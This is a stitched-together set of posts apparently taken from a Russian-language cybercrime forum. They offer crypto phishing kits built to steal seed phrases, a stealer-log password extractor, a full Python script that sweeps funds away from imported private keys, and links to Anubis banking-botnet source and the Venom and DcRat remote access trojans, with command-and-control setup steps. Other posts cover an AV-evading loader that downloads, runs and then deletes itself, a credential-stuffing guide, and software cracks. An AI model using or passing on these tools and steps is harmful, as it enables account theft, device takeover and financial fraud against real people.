Собственно говоря вопрос в шапке темы, давным-давно много лет назад вроде бы юзал какой-то парсер url поисковых систем гугл, и другие по ключевым словам, может даже UCB который был тут(но у меня не парси) и сейчас никак не могу найти бесплатный и рабочий. Если кто знает скиньте ссылку буду очень вам благодарен. Платные версии не интересуют так как в данный момент в финансовом плане полный напряг.
Периодически попадаются фишы по крипто тематике
Дабы не плодить кучу тем под разные фишы ,буду в этом топике периодически
публиковать фишинг сайты заточенные под крипту.
Однако ,следует помнить , нужно заредактить код ,чтобы он стучал вам
1 проект - Reset Multibridge под сбор сид фраз
You must have at least 10 reaction(s) to view the content.
**
2 проект - красивый фиш под OpenSea под сбор сидов с популярных кошельков (один js файл из 5 .js обфусцирован )
You must have at least 15 reaction(s) to view the content.
Привет всем!
Набросал скриптик для добычи сервисов с логов.
Python v3, зависимости:
pip install tldextract
Справка:
Code:Copy to clipboard
Usage: extractor.py [-h] [-t [thread_count]] [-u [ADD_URL]] [-s [splitter]] [-d [domain]] [-f [domain_list]] input_dir out_dir
Extract data from logs directory.
positional arguments:
input_dir input dir with logs | папка с логами
out_dir out_dir dir for extracted data | папка под дату
optional arguments:
-h, --help show this help message and exit
-t [thread_count] count of workers (default 10) | количество потоков
-u [ADD_URL] 1 - add url to output string, host:user:pass (default 0 - user:pass) | формат вывода, -u 1 - url:user:pass
-s [splitter] splitter for data(default ":") | разделитель
-d [domain] extract only specified domain | извлекать только указанный домен -d "facebook.com"
-f [domain_list] extract only specified in file domains | извлечь домены указанные в файле, формат строка - домен
Так же в комплекте скрипт для удаления дубликатов:
python3 dublkiller.py input_dir out_dir
Пожелания и баги принимаються.
Надеюсь софт кому нить пригодиться)
А если пригодиться поблагодарить можно ниже)
bc1qngss0dd966q79rg5p286hgmnfhqnemtwps9r9m
ПыСы: так же в поиске работы, Python, C++, пишите.
Софт для чека ключей Кукоина и Бинанса (Kucoin & Binance)
+ ещё одна крипто биржа любая по вашему ТЗ
Позволит проверить ключь на трейд и баланс
Цена - 10к$ (за 2 чекера + ваш по ТЗ)
Отдаю в трое рук
связь в ЛС или ТГ
Обязательно перед запускам трафа проверить: на ваш ли кошелек приходит монетка после покупки токена!
You must have at least 22 reaction(s) to view the content.
If you need any help using it, contact me at https://t.me/BoBhitBine
*Судя по жалобам - склейка
- TCP network stream (IPv4 & IPv6 support)
- Fast network serialization (Protocol Buffers)
- Compressed (QuickLZ) & Encrypted (TLS) communication
- Multi-Threaded
- UPnP Support
- No-Ip.com Support
- Visit Website (hidden & visible)
- Show Messagebox
- Task Manager
- File Manager
- Startup Manager
- Remote Desktop
- Remote Shell
- Download & Execute
- Upload & Execute
- System Information
- Computer Commands (Restart, Shutdown, Standby)
- Reverse Proxy (SOCKS5)
- Password Recovery (Common Browsers and FTP Clients)
- Registry Editor
- Ring3 Rootkit
- Hidden Process
- Hidden File
- Hidden Startup
- Hidden Remote Desktop - HRDP
- Hidden Remote Desktop - VNC
- Elevate Client Permissions
- UAC Bypass
- Remote WebCam
- Offline Keylogger - Live Keylogger (Unicode Support)
- PasteBin Uploader
- Velos Stealer
- Exploit Word Macro
- AnonFile Upload
1. Remote Desktop Access
It can control and manages your all devices remotely with a very fast and
stable connection over 60 frames per second speed. It is the best rat software
2020.
2. Remotely Transfer Data
Venom Remote Administration Tool can transfer any type of file easily by using
this software to another pc remotely. It can transfer files at a very fast
speed.
3. Hidden RDP ( Remote Desktop Protocol )
Venom software rat has hidden RDP features which is one of the best features
of this rat. This is a new feature in this RAT which you have not seen before
in any other RAT. You can control your victim desktop remotely and hiddenly by
using this feature.
4. Hidden VNC Viewer
It is also one of the advanced and new features of this rat. You can also
remote control your client pc hiddenly bus using this feature. I sure It will
be the best rat software 2021.
5. Power Administration
It is very powerful and all in one feature of this rat. It works like a
control panel and It can show full windows process, functions, programs,
startup, taskbar, running services in one place. You can also enable and
disable any running program and service by using this feature.
REQUIREMENTS
1. Microsoft Netframework 3.5 or 4.6.1
2. Java JDK or JRE
SYSTEM COMPATIBILITY
This RAT ( Remote Access Tool ) is compatible with all windows operating
systems. We successfully tested this RAT on all windows. It works pretty nice
on all operating systems.
Download:
Hidden content for authorized users.
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/ymhQkDCD#hXmWjhK5xcwZ6eekteCK4tDVaRCWyJyeIPB0THFWEQg)
mega.nz
Чекер написан на Python (для работы требуется версия 3.6 и выше)
Поддерживает массовый чек следующих криптовалют Bitcoin, BitcoinCash, Bitcoin
SV, Litecoin, Dash, Dogecoin
Для запуска нужно перейти в папку с чекером в повершелле и выполнить
python wallet_compare.py -f1 файл_со_списком_адресов_с_балансами -f2
ваш_файл_с_любым_количеством_адресов. (каждый адрес с новой строки)
В архиве следующие файлы
wallet_compare.py - сам чекер
blockchair_bitcoin_addresses_and_balance_LATEST.tsv - все адреса с балансами
Bitcoin
blockchair_bitcoin-cash_addresses_latest.tsv - все адреса с балансами
BitcoinCash
blockchair_bitcoin-sv_addresses_latest.tsv - все адреса с балансами Bitcoin SV
blockchair_dash_addresses_latest.tsv - все адреса с балансами DASH
blockchair_dogecoin_addresses_latest.tsv - все адреса с балансами Dogecoin
blockchair_litecoin_addresses_latest.tsv - все адреса с балансами Litecoin
Лучше обновлять все эти файлы перед проверкой.
Скачать актуальный первый файл можно отсюда на нормальной скорости
All about Bitcointalk statistics and data developed by LoyceV!
addresses.loyce.club
Все остальные можно скачать отсюда (ограничение по скорости и максимум можно
скачивать только 1 файл за раз)
gz.blockchair.com
Файлы по урлам обновляются 1-2 раза в день.
run.sh - скрипт bash нужен для массового чека всех поддерживаемых криптовалют.
Пользователи винды его могут так же использовать переименовав в run.bat
Если создать тексовики с названиями BCH.txt, BSV.txt, BTC.txt, DASH.txt,
DOGE.txt, LTC.txt и положить в них адреса от соответствующих криптовалют то
скрипт чекнет все за раз.
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/qlVRRCrT#naZaPsT4I8KgM3WQnvYvIzlCZQn1mM6G_ssQCEq2ZBg)
mega.nz
Пароль xss.is
Donate
Bitcoin bc1qphw8hltvwp6gqn6rx3rwgtuzxrcar6ap50rcqr
ETH 0x1C3136Ad67718Ebb6B235e159db761c5d657d0cf
6я версия панели
Июль 2018
https://www.sendspace.com/file/x3zn7p
БД
Знаю что многим необходим подобный софт. Продавать его не вижу смысла так как он полностью построен на опенсорсе, точнее на кошельке электрум.
Функционал следующий.
Софт почти моментально (мониторит каждую секунду) осуществляет автовывод
средств поступивших на отслежваемый адрес.
В настройках можно выставить отдельно с какой периодичностью выполнять
мониторинг, по дефолту раз в секунду.
Так же в настройках можно вытсавить отдельные комиссии для подтвержеднных
монет и для не подтвержденных. (да, не подтвержеднные монеты могут тоже будут
сразу же отправлены при поступлении на адрес)
Ну и естественно настраивается минимальная сумма для вывода (значение
минимальной суммы единое как для подтвержеднных так и для не подтвержеднных
монет)
0. Требуется Linux конечно же (за небольшой донат могу сделать версию для Windows обращаться в ПМ).
1. Качаем сам кошелек с официального сайта https://download.electrum.org/4.2.1/electrum-4.2.1-x86_64.AppImage
2. Ложим его в любую папку из которой будет работать автовывод
3. Назначаем права на исполнение
Code:Copy to clipboard
cd 'путь до ппаки с софтом'
Далее
Code:Copy to clipboard
sudo chmod +x electrum-4.2.1-x86_64.AppImage
4. Запускаем как обычно и создаем новый кошелек.
Импортируем туда фразу или приватный ключ за которым хотим утсановить
мониторинг, если импортируете приватные ключи то их можно вбить сразу
несколько.
5. Оставляем кошелек запущенным (во время работы автовывода кошелек всегда должен быть запущен)
6. Создаем в этой же папке текстовик electrum.py
В него помещаем следующий код
Python:Copy to clipboard
import os
import sys
import subprocess
import json
import time
MY_BTC_ADDR='АДРЕС'
MIN_BALANCE=0.005
FEE_RATE_CONFIRM=50
FEE_RATE_UNCONFIRM=80
PAUSE=1
ELECTRUM_FILE='./electrum-4.2.1-x86_64.AppImage'
LOG='electrum.log'
def write_log(mess):
print(mess)
with open(LOG,'a',encoding='utf8') as f:
f.write(mess+'\n')
if __name__=='__main__':
with open(LOG,'w',encoding='utf8'):
pass
while True:
try:
# get balance
proc = subprocess.Popen(f"{ELECTRUM_FILE} getbalance", shell=True,stdout=subprocess.PIPE)
out = proc.communicate()
d=json.loads(out[0])
write_log(f'Balance:{d}')
#check confirmed
valid_balance=False
fee=0
if 'confirmed' in d:
if float(d['confirmed'])>MIN_BALANCE:
valid_balance=True
fee=FEE_RATE_CONFIRM
# check unconfirmed
if not valid_balance:
if 'unconfirmed' in d:
if float(d['unconfirmed']) > MIN_BALANCE:
valid_balance = True
fee = FEE_RATE_UNCONFIRM
if valid_balance:
# send maximum
proc = subprocess.Popen(f"{ELECTRUM_FILE} payto {MY_BTC_ADDR} ! --feerate {fee}",shell=True, stdout=subprocess.PIPE)
out = proc.communicate()
print(out)
trn=out[0].decode('utf8').strip()
write_log(f'Transaction:{trn}')
# broadcast transaction
proc = subprocess.Popen(f"{ELECTRUM_FILE} broadcast {trn}",shell=True, stdout=subprocess.PIPE)
out = proc.communicate()
print(out)
res=out[0].decode('utf8').strip()
write_log(f'Broadcast result:{res}')
except KeyboardInterrupt:
print('Stop.')
break
except:
print(f'ERROR {sys.exc_info()}')
time.sleep(PAUSE)
Зупускаем
Code:Copy to clipboard
python electrum.py
Все. Теперь при поступлении средств они будут автоматом выведены на указанный вами адрес.
Настройки
Code:Copy to clipboard
MY_BTC_ADDR='АДРЕС'
MIN_BALANCE=МИНИМАЛЬНЫЙ БАЛАНС ДЛЯ ВЫВОДА НАПРИМЕР 0.005
FEE_RATE_CONFIRM=50 КОМИССИЯ ДЛЯ ПОДТВЕРЖДЕННЫХ МОНЕТ
FEE_RATE_UNCONFIRM=80 КОМИССИЯ ДЛЯ НЕ ПОДТВЕРЖДЕННЫХ МОНЕТ
PAUSE=1 ПАУЗА В СЕКУНДАХ МЕЖДУ ПРОВЕРКАМИ БАЛАНСА
Так же должен сказать что данное решение позволяет мониторить не больше 30-50 приватных ключей. При попытке запихать туда овер дофига приватников бы будите забанены нодами и кошелек не будет с ними соеденяться. Сори за меркантильность но данную проблему я тоже могу решить за донат, но лично мне хватает вполне и монитринга 20 адресов.
Windows Patch
1. Set hosts:
C:\Windows\System32\drivers\etc\hosts
127.0.0.1 updates.acunetix.com
127.0.0.1 erp.acunetix.com2. Install Acunetix
3.Replace License:
%ProgramData%\Acunetix\shared\license\license_info.json
%ProgramData%\Acunetix\shared\license\wa_data.datTo Set Read-only Attribute of license_info.json:
attrib +r %ProgramData%\Acunetix\shared\license\license_info.jsonLinux Patch
1. Set hosts:
vi /etc/hosts
127.0.0.1 updates.acunetix.com
127.0.0.1 erp.acunetix.com2. Install Acunetix
3. Stop Acunetix Service:
sudo systemctl stop acunetix.service4.Replace License:
/home/acunetix/.acunetix/data/license/license_info.json
/home/acunetix/.acunetix/data/license/wa_data.datTo Set Read-only Attribute of license_info.json:
chmod 444 /home/acunetix/.acunetix/data/license/license_info.json
chown acunetix:acunetix /home/acunetix/.acunetix/data/license/wa_data.dat5. Start Acunetix Service:
sudo systemctl start acunetix.serviceClick to expand...
~ Source Code + Panel + Builder apk ~
https://www.mediafire.com/file/ds48em9lnsjge1s/Anubis-8.0-Banking_Botnet.rar/file
Привет соратники! Мы с командой собрались и решили написать удобное приложение для нас всех. Данное приложение только для телефонов под Android. Возможно потом расширим платформы.
Что представляет из себя само приложение. Это удобный мобильный клиент для darknet площадок, и не только. Количество форумов мы будем постоянно расширять. Так же для нас очень важна ваша безопасность. Ни какие данные не передаются за пределы приложения и используемого форума.
Так же в приложении есть механизм обратного пароля. При вводе которого, все данные стираются и вас ни кто не в чем не уличит. Так же все рабочие данные хранятся только зашифрованные. И в оперативной памяти. Ни какой анализ APK или вашего телефона не выдаст вас.
ПРИЛОЖЕНИЕ РАБОТАЕТ ТОЛЬКО ПРИ ВКЛЮЧЕННОМORBOT.
Сейчас поддерживается форумов:
1. XSS.IS
Что планируется сделать:
1. Добавить форум exploit (в ближайшее время)
2. Добавить личные сообщения (на основе GPG). Даже администрация площадок не
сможет читать ваши сообщения.
3. Сделать межфорумную связь. Обмен сообщениями будет проходить так же на
основе GPG и ни мы ни другие люди не смогут прочитать вашу переписку.
4. Авторизацию через камеру, чтобы не вводить мега сложные пароли.
Ну и многое другое.
Связь TOX (автор) :
C22187A7B956BB1C8A6E38FA70F8303DBCD8C9D506089314664AC76A9F37B0156B34E137518D
Так же вы можете помочь нашей разработке
BTC
bc1qut34n3yh7qtdlgfmntga99y59rzfmagp0xrd5u
GitHub :
[ http://snw2i6zk7htxx7dtejpc7mq7omk7zxkpoczi3k6af3rmpmuxfvig2rid.onion/Mestima/Reptiloid- Eye ](http://snw2i6zk7htxx7dtejpc7mq7omk7zxkpoczi3k6af3rmpmuxfvig2rid.onion/Mestima/Reptiloid- Eye)
ВАЖНО! Мы не делаем готовые сборки и не будем делать. Просим приложение собирать из исходников. Чтобы ни кто не смог ни чего туда встроить. Так же не берите APK у других пользователей. Помните о вашей безопасности. Можете написать нам по контактам и мы дадим инструкцию по сборке.
P.S. Если у вас идеи, пишите, мы обязательно постараемся это реализовать. Программное обеспечение, всегда будет бесплатный и opensource.
программа для обработки логов с ваших стиллеров. работает быстрее всяких тотал
командеров и прочего хлама.
пример использования:
достать все файлы указанные в -p и сложить их в outdir ./linux -d /path/to/logs/folder/ -o outdir -p "passwords.txt PasswordsLogs.txt passwords.log"
все passwords.txt, etc... слить в один файл в outdir ./linux -d /path/to/logs/folder -o outdir -p "passwords.txt PasswordsLogs.txt passwords.log" -j
linux/windows https://mega.nz/folder/RVtUnaqa#Gt0PZPKD3zB6kYnpHRZU7g
Acunetix
Version 13 (build 13.0.200930102 for Windows, Linux and macOS) 30th
September 2020
New Features
- Export Scans to JSON (available as WAF Export option)
- Added context-sensitive help for all pages in the UI. Clicking on the ? icon will open documentation for the specific page
New Vulnerability Checks
- New test for Apache OFBiz XMLRPC Deserialization RCE (CVE-2020-9496)
- New test for [No HTTP Redirection](https://infosec.mozilla.org/guidelines/web_security#http- redirections)
- Numerous tests related to TLS / SSL, including:
- Added support for 200 new cipher suites, bringing the total number of supported cipher suites to 360
- New test for TLS/SSL Diffie-Hellman Key Reuse (prerequisite for Raccoon Attack)
- New test for TLS/SSL LOGJAM attack (CVE-2015-4000)
- New test for TLS/SSL Sweet32 attack (CVE-2016-2183 and CVE-2016-6329
- Alert if server offers cipher suites with symmetric encryption key length <128
- Alert if server offers cipher suites using symmetric encryption algorithms RC2, DES (insecure), IDEA
- Alert if server offers cipher suites using ANON, NULL, SHA-1 for authentication
- Alert if server offers cipher suites using MD5 for HMAC
- New vulnerability checks for WordPress plugins and Drupal core
Updates
- Numerous updates to the UI
- Malware scan profile updated to check for Trojans
- Scanner updated to receive newly discovered hosts from vulnerability checks
- Updated Swagger 2 implementation to better cater for nested schemes/objects
- Updated deduplication to better cater for network scans / vulnerabilities
- Adaptive ciphersuite testing, reduces the average SSL/TLS scan duration by 90%
Fixes
- Fixed issue where no data was shown for archived scans
- Fixed some minor issues with default filters
- Fixed issue showing wrong Target count in license page
- Fixed UI issue affecting Custom Scan Profiles
- Fixed Possible Sensitive Files / Folders to use the Case Sensitive Paths setting for the Target
- Fixed issue in Reverse Proxy Detection check
Click to expand...
Лечение:
Скачать:
You must have at least 10 reaction(s) to view the content.
Поделитесь брутом ftp, многопоточным с поддержкой прокси.
Весьма признателен)
Имеются ли такие или только приватные покупать?
Всех приветствую хочу с вами поделиться opensource ратником называется он
DcRat не (DarkCrystal Rat).
Скриншот ратника
За основу данного ратника взяты популярные ратики Quasar,AsyncRAT.
Отличительными особенностями является расширенный функционал, а именно
(смотреть ниже)
Заключительной особенностью является поддержка ngrok в связке с pasterbin -
обозначает что вам не нужен статистический ip.
Работа этой связки:
1)Регистрируете аккаунт ngrok и pastebin
2)Скачиваете ngrok и авторизуетесь в нём через команду (ngrok authtoken ваш-
токен)
3)Запускаем прослушивание на стандартном порте 8848 (ngrok tcp 8848)
4)Копируем наш адрес и порт (0.tcp.ngrok.io:14878)
5)Переходим на pastebin и создаём новую записку и вставляем наш ip:port ngrok
(обязательно должно быть публичным и без пароля)
6)Копируем адресную строку и запускаем DcRat
7)Запускаем DcRat на порте который открыли в ngrok 8848
8)Переходим в меню File->builder
9)Настройки по умолчанию
10) Ставим галочку get by link, вставляем
должно получиться так
(https://pastebin.com/raw/vP7hSTWE) и выбираем по желанию рекомендуемые
настройки на скриншоте и создаём билд (PROFIT)
11) В последующие разы надо запускать ngrok и изменять значения в вашей
сохранённой пасте
Спасибо за ваше внимание.
Ссылка на github проекта: https://github.com/qwqdanchun/DcRat
Ссылка на github разработчика:https://github.com/qwqdanchun
Если есть вопросы писать Мне или Разработчику
Связь только ТГ лс форума редко смотрю @zerosumOxO (O - не ноль)
Snoop — инструмент разведки на основе открытых данных (OSINT world)
В начале 2020 года вышло обновление OS Kali Linux 2020.1, в котором среди
«прочих» изменений было отмечено — добавлением в репозиторий (аналогично и в
Parrot OS) нескольких новых утилит, в т.ч. и утилиты Sherlock.
Snoop Project (далее просто snoop) — это форк Sherlock Project-a (над
которым потрудились > 80ч в тч и Я). Общая идея взята у WhatsMyName и
Namechk. Существенное отличие заключается в том, что Snoop нацелен в т.ч. на
СНГ, а не только на популярные, публичные, международные интернет ресурсы, где
можно прочекать любой nickname/email инструментом конкурентом. На данный
момент Snoop сильнее всех вышеупомянутых OSINT-проектов вмеcте взятых.
База Snoop была
расширена до 1.2к
sites не только потому что существует возможность дёрнуть %username из строки
браузера, но и благодаря некоторым секретам: — манипуляцией с http/s
заголовками.
Spoiler: +Фото+
Обновляемая база Snoop
Snoop обновление ПО
Snoop for Android
Snoop report csv
Snoop report html
К другим различиям можно отнести существенно более информативный вывод в
Snoop; добавление новых опций; выгрузка данных по username; добавление
персональных и глобальных оповещений; поддержка ОС Windows 7/10 (32-64bit);
добавление формата html (отчёты в: CLI; CSV; HTML; txt) ; улучшенный парсинг
сайтов, в т.ч. за счёт нового метода парсинга username с солью и радикальные
изменения в БД; поиск username с пробелом типа «ivanov ivan»; поиск ника на
основе e-mails; подключение к раширяемой и обновляемой БД Snoop (Online);
добавлением режим SNOOPninja (на GNU/Linux творит чудеса) ; самотестирование
сети и наличие возможности обновления ПО (исходного открытого кода).
Специально для Snoop записаны два soundtrack-a в жанре cyberpunk.
Для OS Windows и GNU/Linux выпускаются готовые сборки (не нужно устанавливать
Python и обладать какими-то специальными знаниями ЯП).
Spoiler: Всё ли знает Google? И Зачем нужен Snoop
Вот мнение автора книги по Web Scraping-у:
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2F0n%2Fbm%2F2o%2F0nbm2odpklms1ykz-
uokhzfgcrw.png&hash=35ae2320880ac2a71ee24e03c7dda022)
Web Scraping with Python by Ryan Mitchell (O’Reilly). Copyright 2015 Ryan
Mitchell, 978-1-491-91029-0.
Добавлю и свои наблюдения.
Поисковые роботы парсят всю информацию с сайта, в тч., опираясь на robots.txt
или API. Иногда, в robots прописывают правила, запрещающие парсить username
(это существенный 'минус' поисковиков). После получения поисковых
результатов, пользователю нужно самому фильтровать информацию (много
информации), используя различные дорки и своё время. Еще такой момент:
nickname != имя. Если вы будете искать в поисковой системе nickname, например,
такой: 'su..e...a' (заменив точки на то, что просится) , то что вам выдаст
поисковик? Snoop же найдёт десяток таких аккаунтов.
К слову, это совсем не должно беспокоить публичную или ту категорию людей, которой нечего скрывать, и у кого и так цифровой след растянут от адреса проживания до всевозможных уголков в киберпространстве.
Например, найдя с помощью snoop %username в Яндекс.маркете/картинках/музыке, становится известна почта разыскиваемого персонажа (и даже 'Имя и Ф.', если указанно в Я.Паспорте). А благодаря знакомствам на Ramblere, компания которая для чего-то сохраняла и накапливала огромную БД с прошлого десятилетия, сейчас эта БД доступна на весь мир, а в ней частенько фигурируют настоящие имена и даты рождения в дополнительных полях под %usename.Проблема заключается в том, что «последний раз username заходил в онлайн 10 лет назад». Что такое почта от Рамблера, думаю, вы знаете, поэтому такой цифровой след разорвать трудно. Не помню, чтобы я и "..." в такой «пробазе» регались от избытка чувств (возможно, всё парсилось и дампилось из ICQ мессенджера в далёкие свободные времена). Приведенные выше примеры, отображают лишь часть работы Snoop Projecta для общественного понимания.
«Развед данные» публичные данные анализируются в каждом случае индивидуально и Snoop отличный дополнительный OSINT-инструмент к подобному ~~и альтернативному~~ софту, который в заданном направлении уверенно поддерживает высокую планку (самую высокую в ru-локации).
И так, чтобы никого из популярных личностей ~~не чекать~~ не обидеть,
ограничусь лишь картинками с ярко-выраженными публичными данными.
[GIF]
Hidden content for authorized users.
Spoiler: Небольшой конкурс
Приз:: Snoop Full Version for GNU/Linux RU (недельная лицензия одна копия).
Условия:Своими словами описать, что вы видите на скрине?
Максимально-точное или максимально-приближенное описание [Подробное].
Выбирать комментарий победителя буду лично..
От одного аккаунта не больше 2-х комментов по конкурсу (ответы).
Ответы буду рассматривать до 19 июля 2020.
Сканер безопасности веб-приложений Netsparker Professional
Автоматический, чрезвычайно точный и простой в использовании сканер
безопасности веб-приложений для автоматического поиска недостатков
безопасности на ваших веб-сайтах, веб-приложениях и веб-службах.
Проверяйте безопасность своих веб-сайтов с помощью сканера безопасности веб- приложений Netsparker
Netsparker находит и сообщает об уязвимостях веб-приложений, таких как внедрение SQL и межсайтовые сценарии (XSS), во всех типах веб-приложений, независимо от платформы и технологий, на которых они созданы. Уникальная и абсолютно точная технология сканирования на основе доказательств Netsparker не только сообщает об уязвимостях, но и выдает доказательство концепции, подтверждающее, что они не являются ложными срабатываниями. Это избавляет вас от необходимости перепроверять выявленные уязвимости.
Netsparker Professional Edition Полная активация
Некоторые из основных тестов безопасности должны включать тестирование:
SQL-инъекция
XSS (межсайтовый скриптинг)
DOM XSS
Внедрение команд
Слепая инъекция команд
Включение локальных файлов и чтение произвольных файлов
Включение удаленных файлов
Удаленная инъекция / оценка кода
CRLF / HTTP-заголовок инъекции / разделение ответа
Открытое перенаправление
Внедрение кадров
Пользователь базы данных с правами администратора
Уязвимость - база данных (предполагаемые уязвимости)
ViewState не подписан
ViewState не зашифрован
Веб-бэкдоры
Включена поддержка метода TRACE / TRACK
Отключена защита XSS
Отладка ASP.NET включена
ASP.NET Trace включен
Доступные файлы резервных копий
Доступные страницы состояния сервера Apache и информации о сервере Apache
Доступные скрытые ресурсы
Уязвимый файл Crossdomain.xml
Уязвимый файл Robots.txt
Уязвимый Google Sitemap
Раскрытие исходного кода приложения
Уязвимость файла политики клиентского доступа Silverlight
Раскрытие информации и исходного кода CVS, GIT и SVN
Доступность страниц PHPInfo () и раскрытие информации PHPInfo () на других
страницах
Доступ к конфиденциальным файлам
ТЕЛО ответа на переадресацию слишком велико
У ТЕЛА ответа на переадресацию есть два ответа
Схема небезопасной аутентификации, используемая через HTTP
Пароль передан по HTTP
Форма пароля, обслуживаемая через HTTP
Аутентификация, полученная методом грубой силы
Базовая аутентификация, полученная через HTTP
Слабые полномочия
Раскрытие адреса электронной почты
Внутреннее раскрытие IP
Список каталогов
Раскрытие версии
Раскрытие внутреннего пути
Доступ запрещен к ресурсам
Раскрытие информации MS Office
Автозаполнение включено
Раскрытие имени пользователя MySQL
Безопасность страницы по умолчанию
Файлы cookie не отмечены как безопасные
Файлы cookie не помечены как HTTPOnly
Раскрытие трассировки стека
Сообщение об ошибке программирования
Раскрытие сообщений об ошибках базы данных
Лицензия на программное обеспечение: Professional Edition
Версия: 6.1.0.31760
Цена: 29 995 долларов США - 1 год
Скидка: 100% OFF
Имя файла: Netsparker Professional Edition v6.1.0.31760 Полная активация -
WwW.Dr-FarFar.CoM.zip
Размер: 181 МБ
![gofile.io](/proxy.php?image=https%3A%2F%2Fgofile.io%2Fdist%2Fimg%2Flogo- small-og.png&hash=32429581fada6ae1887e27dfa99f76aa&return_error=1)
](https://gofile.io/d/1AVmD7)
Gofile is a free, secure file sharing and storage platform. With unlimited bandwidth and storage, you can easily store and share files of any type without any limits. Our advanced features, such as CDN support and password protection, make Gofile the ideal choice for individuals and businesses...
gofile.io
Pass:StargatE8889
Xray Pro WebScanner tool Latest vserion 1.7.1 Cracked by Pente3ter12
Hidden content for authorized users.
Password: xss.is
You must have at least 4 message(s) to view the content.
Всем привет.Как заразить телефон на андройде что бы Кх нажал на картинку и apk автоматически сделал установку ? Или кто сможет это сделать?
Tonight I will release you a new inj update, I realized I made a mistake, because I was working on two different platforms, so you will find the correction of some errors, and the update of some fake app, try to launch the old fake de_Deutschebank, with the fake locker, then tonight replace it with the new one and give me your opinion ... Anubis 2.5 will be operational again
CardPayPortal source code leak by r3set
CardPayPortal незаконний P2P шлюз
Карты для P2P CardPayPortal дергает с P2P обменника крипты risex.net -
подключенного к ним по API
You must have at least 5 reaction(s) to view the content.
RBTOOLS CRACKED
Twitch Fractor CRACKED (оч хорошо крутит)
www12.zippyshare.com/v/qx9kPdvi/file.html
pass - местный
BTCdiger (Биткоин копатель)
Закрытые ключи генерируются рандомным образом для создания 32-байтовой
шестнадцатеричной строки с использованием криптографически безопасной функции.
Закрытые ключи преобразуются в соответствующие им открытые ключи.
Тем самым, мы получаем биткоин адрес и его приватный ключ.
Сгенерированный адрес ищется в базе данных, и если обнаруживается, что адрес имеет баланс, то закрытый ключ, открытый ключ и адрес кошелька сохраняются в текстовом файле BTCdiger.txt.
Сколько адресов в базе данных?
В база данных в настоящее время хранится 33 миллиона адресов с балансом.
Это общее количество адресов P2PKH Биткойн с балансом, которые существуют в
цепочке блоков.
После загрузки базы нужно подождать несколько минут...
(Зависит от размеры базы и от вашего железа)
СИСТЕМНЫЕ ТРЕБОВАНИЯ!!
Например, для загрузки 33 файлов, будет достаточно 16ГБ RAM, а для 18 файлов
(4 ГБ RAM) .
Один файл — 1 миллион адресов.
Программа использует многопроцессорную обработку для выполнения параллельных
вычислений.
Адрес проверятся за 0.0032457721 сек × на ко-во CPU.
Нашли адрес с балансом, что делать дальше?
Скачайте кошелек Electrum и там импортируйте приватный ключ, который
сохранился в BTCdiger.txt
(вы зайдете в кошелек, и увидите тот самый адрес вместе с его балансом).
Вы сможете вывести с Electrum все средства, на свой bitcoin кошелек(либо вернуть владельцу)
Если при загрузке базы у вас появится ошибка, значит нужно ее сократить, попробуйте убрать лишние файлы. А также, если в процессе работы начнет зависать, просто понаблюдайте, сколько у вас свободно оперативной памяти. Вся проблема в оперативке.
Я думаю, есть шанс победить, при условии что пройдет менее 3000 лет.
(вы сможете проверять десятки миллионов адресов в сутки)
Скачать тут:
https://mega.nz/file/7DJxCKZS#u5TqbQ8HD61xFGeFOggTXAQMwYZThvou5tKtcUNy3Jw
Virustotal:
https://www.virustotal.com/gui/file...f562d98112e3fac143da193183095dacaa0/detection
Суть была обойти рантайм детект некоторых АВ, мб кому пригодится.
You must have at least 10 reaction(s) to view the content.
Качает zip архив под паролем которому можно поменять формат.
Например: install.y
Вводит пароль который закодировал в лоадере в base64, Распаковывает и
запускает
После самоудаляется
Вес 141кб из за библиотеки SharpZipLib
Так же использовал Fody что бы запихнуть ту самую библиотеку в exe
You must have at least 100 reaction(s) to view the content.
Перед размещением топика все проверил, работает.
Быстрый старт в классическом брутфорсе
В статье расскажу, как быстро запустить определенный конфиг в Silver Bullet и приступить к метким попаданиям
После запуска перед нами появляется вот такое окно
На данном этапе нам пока ничего здесь не нужно
Второе окно, прокси, тоже полезная штука
Тут я думаю все ясно, импорт - импортируем .txt файл с нашими проксями,
экспорт выгружаем их, например после чека, по остальному суть очевидна.
Так же они сохраняются в программе после обработки
В разделе Configs видим все свои добавленные конфиги, директорию хранения можно посмотреть через Open Folder, туда то мы и будем их грузить
Софт ест файлы формата .svb, то есть конфиг
Переходим опять на главную "Runner", жмем New, кликаем по созданному проекту
Откроется окно настройки
Здесь все предельно ясно.
Bots - это потоки
Prox - прокси (вкл, выкл)
Select CFG - выбираем добавленный ранее конфиг
Select List - выбираем нашу БД
Так же можно начать чек с определенной строки, двигая ползунок вправо/влево. Или написать точную цифру.
Добавили бд, внесли конфиг, загрузили прокси. Осталось только нажать старт и надеяться на меткое попадание.
SVB:
https://github.com/mohamm4dx/SilverBullet/releases/download/1.1.2/SilverBullet.v1.1.2.rar
Старый конфиг для теста: https://anonfiles.com/BaWdPatcud/MullvadVPN_svb
Свежие сокс4: https://anonfiles.com/N8B709x8u7/socks4_txt
БД: https://xss.is/threads/52055
Были изложены только минимальные способности данного софта, кому он будет
интересен, могут исследовать исходный код, а так же внутренний интерфейс и
функции программы.
IMPORTANT! Performing (D)DoS attacks or credential stuffing on sites you do
not own (or you do not have permission to test) is illegal! The developer will
not be held responsible for improper use of this software.
![](/proxy.php?image=https%3A%2F%2Fwww.tegakari.net%2Fwp- content%2Fuploads%2F2010%2F10%2Fmaltego_renew_img.jpg&hash=ac9e38d5dbf49cc8a3d11f9413296bf3)
is an open-source intelligence (OSINT) and graphical link analysis tool for gathering and connecting information for investigative tasks.
See all versions and the according to changes.
Version 4.2.16 – 2021/03/24
[Fixed]
Software License : XL Edition
Version : 4.2.16.13775
~~Price: $ 1999~~
Hidden content for authorized users.
[URL unfurl = "true"] https://mega4up.com/0lb43gmq252y [/ URL] [/ HIDE]
Password:
Hidden content for authorized users.
Dr.FarFar
Да, как бы сливали, но в теме ничего по установке толком не было сказано, да и
демка бота там не работала
Чё там про него писали? Ах да
Добавлена система "Внутренний баланс пользователя в боте" - Пополнение
баланса в боте, и оплата ТоваровУслуг бота через него.
Возможность выбора режима работы бота:
